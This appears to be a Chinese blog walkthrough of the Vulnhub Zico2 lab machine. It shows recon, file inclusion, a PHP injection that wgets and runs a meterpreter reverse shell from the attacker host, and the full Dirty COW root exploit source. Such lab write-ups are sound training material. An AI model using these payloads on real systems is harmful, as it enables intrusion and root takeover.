(Vulnhub练习)-- Zico2渗透实战

(Vulnhub练习)-- Zico2渗透实战

Zico2渗透实战

下载地址

http://www.vulnhub.com/entry/zico2-1,210/

此文章是参照大佬橘子女侠的文章写的

以下为我跟着他的文章整理的笔记

主机发现

sudo netdiscover -i eth0 -r 192.168.100.0/24

目标主机IP:192.168.100.153

(Vulnhub练习)-- Zico2渗透实战

端口扫描

sudo nmap -A 192.168.100.153

(Vulnhub练习)-- Zico2渗透实战

指纹识别

whatweb 192.168.100.153

(Vulnhub练习)-- Zico2渗透实战

目录扫描

dirsearch  -u http://192.168.100.153

(Vulnhub练习)-- Zico2渗透实战

ssh弱密码扫描

hydra -L top500.txt -P top6000.txt  192.168.100.153  ssh  

(Vulnhub练习)-- Zico2渗透实战

nitko

sudo nikto -h 192.168.100.153 

(Vulnhub练习)-- Zico2渗透实战

访问目标靶机的80端口,寻找有价值的信息;

http://192.168.100.153/view.php?page=tools.html

看到链接后面有?page= tools.html,猜想:是否该页面包含文件包含漏洞;

尝试文件包含漏洞

http://192.168.100.153/view.php?page=/etc/passwd
http://192.168.100.153/view.php?page=../etc/passwd
http://192.168.100.153/view.php?page=../../etc/passwd

(Vulnhub练习)-- Zico2渗透实战

由扫描到的网站目录进入/dbadmin/

http://192.168.100.153/dbadmin/test_db.php

(Vulnhub练习)-- Zico2渗透实战

查询对应版本的漏洞;

searchsploit phpLiteAdmin

(Vulnhub练习)-- Zico2渗透实战

存在PHP 远程代码注入漏洞;

尝试使用弱口令进行登录数据库

admin 成功登录,

(Vulnhub练习)-- Zico2渗透实战

查看敏感的信息users表中info

http://192.168.100.153/dbadmin/test_db.php?action=row_view&table=info

(Vulnhub练习)-- Zico2渗透实战

md5解密后成功获取两个账户:

  • root 34kroot34
  • zico zico2215@

尝试使用ssh登录

ssh root@192.168.100.153 
  • 两个账户都登录失败;

命令注入漏洞和文件包含漏洞的利用

原理:创建的数据库中表的内容的值可以通过文件包含解析成php

创建一个数据库:xiao;创建一个表:xiu,1个字段信息;

(Vulnhub练习)-- Zico2渗透实战

(Vulnhub练习)-- Zico2渗透实战

value写成phpinfo

'<?php phpinfo();?>'

(Vulnhub练习)-- Zico2渗透实战

通过文件包含访问数据库文件xiao

http://192.168.100.153/view.php?page=../../usr/databases/xiao

(Vulnhub练习)-- Zico2渗透实战

同理在网站数据库中上传脚本文件获取目标靶机的shell

创建一个数据库:shell;创建一个表:xiu,1个字段信息;

  • msfvenom生成木马
sudo msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.100.143 LPORT=4444 -b "\x00" -i 10 -f elf -o  /var/www/html/xiao3

linux.rc文件

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.100.143
set LPORT 4444
exploit
  • 开启监听
msfconsole  -qr /home/xiaoxiaoran/shell/linux.rc  

注入的value为

<?php system("wget 192.168.100.143/xiao3 -O /tmp/xiao3;cd /tmp;chmod +x xiao3;./xiao3 &")?>

(Vulnhub练习)-- Zico2渗透实战

访问执行

http://192.168.100.153/view.php?page=../../usr/databases/shell

(Vulnhub练习)-- Zico2渗透实战

(Vulnhub练习)-- Zico2渗透实战

拿到shell,开始提权,脏牛提权

  • dirty.c文件
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>

const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";

int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;

struct Userinfo
{
  char *username;
  char *hash;
  int user_id;
  int group_id;
  char *info;
  char *home_dir;
  char *shell;
};

char *generate_password_hash(char *plaintext_pw)
{
  return crypt(plaintext_pw, salt);
}

char *generate_passwd_line(struct Userinfo u)
{
  const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
  int size = snprintf(NULL, 0, format, u.username, u.hash,
                      u.user_id, u.group_id, u.info, u.home_dir, u.shell);
  char *ret = malloc(size + 1);
  sprintf(ret, format, u.username, u.hash, u.user_id,
          u.group_id, u.info, u.home_dir, u.shell);
  return ret;
}

void *madviseThread(void *arg)
{
  int i, c = 0;
  for (i = 0; i < 200000000; i++)
  {
    c += madvise(map, 100, MADV_DONTNEED);
  }
  printf("madvise %d\n\n", c);
}

int copy_file(const char *from, const char *to)
{
  // check if target file already exists
  if (access(to, F_OK) != -1)
  {
    printf("File %s already exists! Please delete it and run again\n",
           to);
    return -1;
  }

  char ch;
  FILE *source, *target;

  source = fopen(from, "r");
  if (source == NULL)
  {
    return -1;
  }
  target = fopen(to, "w");
  if (target == NULL)
  {
    fclose(source);
    return -1;
  }

  while ((ch = fgetc(source)) != EOF)
  {
    fputc(ch, target);
  }

  printf("%s successfully backed up to %s\n",
         from, to);

  fclose(source);
  fclose(target);

  return 0;
}

int main(int argc, char *argv[])
{
  // backup file
  int ret = copy_file(filename, backup_filename);
  if (ret != 0)
  {
    exit(ret);
  }

  struct Userinfo user;
  // set values, change as needed
  user.username = "firefart";
  user.user_id = 0;
  user.group_id = 0;
  user.info = "pwned";
  user.home_dir = "/root";
  user.shell = "/bin/bash";

  char *plaintext_pw;

  if (argc >= 2)
  {
    plaintext_pw = argv[1];
    printf("Please enter the new password: %s\n", plaintext_pw);
  }
  else
  {
    plaintext_pw = getpass("Please enter the new password: ");
  }

  user.hash = generate_password_hash(plaintext_pw);
  char *complete_passwd_line = generate_passwd_line(user);
  printf("Complete line:\n%s\n", complete_passwd_line);

  f = open(filename, O_RDONLY);
  fstat(f, &st);
  map = mmap(NULL,
             st.st_size + sizeof(long),
             PROT_READ,
             MAP_PRIVATE,
             f,
             0);
  printf("mmap: %lx\n", (unsigned long)map);
  pid = fork();
  if (pid)
  {
    waitpid(pid, NULL, 0);
    int u, i, o, c = 0;
    int l = strlen(complete_passwd_line);
    for (i = 0; i < 10000 / l; i++)
    {
      for (o = 0; o < l; o++)
      {
        for (u = 0; u < 10000; u++)
        {
          c += ptrace(PTRACE_POKETEXT,
                      pid,
                      map + o,
                      *((long *)(complete_passwd_line + o)));
        }
      }
    }
    printf("ptrace %d\n", c);
  }
  else
  {
    pthread_create(&pth,
                   NULL,
                   madviseThread,
                   NULL);
    ptrace(PTRACE_TRACEME);
    kill(getpid(), SIGSTOP);
    pthread_join(pth, NULL);
  }

  printf("Done! Check %s to see if the new user was created.\n", filename);
  printf("You can log in with the username '%s' and the password '%s'.\n\n",
         user.username, plaintext_pw);
  printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
         backup_filename, filename);
  return 0;
}
  • 转换shell
meterpreter > shell
  • 将shell转换为交互式的tty
python -c 'import pty;pty.spawn("/bin/bash")'  

(Vulnhub练习)-- Zico2渗透实战

  • 脏牛提权
cd /tmp
wget 192.168.100.143/dirty.c
gcc -pthread dirty.c -o exp -lcrypt
./exp xiuxiu

(Vulnhub练习)-- Zico2渗透实战

提权成功

密码为xiuxiu ,firefart即为root管理员

(Vulnhub练习)-- Zico2渗透实战

在zizo的目录下发现了WordPress文件;

cd /home/zico/wordpress
cat wp-config.php

(Vulnhub练习)-- Zico2渗透实战

(Vulnhub练习)-- Zico2渗透实战

wp-config.php 文件是WordPress数据库的关键。

数据库名、用户名、密码、位置都是在此设置。

  • 获取到用户名: zico
  • 密码: sWfCsfJSPV9H3AmQzw8

利用得到的密码尝试去登录ssh

 ssh zico@192.168.100.153

(Vulnhub练习)-- Zico2渗透实战

上一篇:Vulnhub靶场渗透-mrRobot


下一篇:脚本小子学习--vulnhub靶机DC8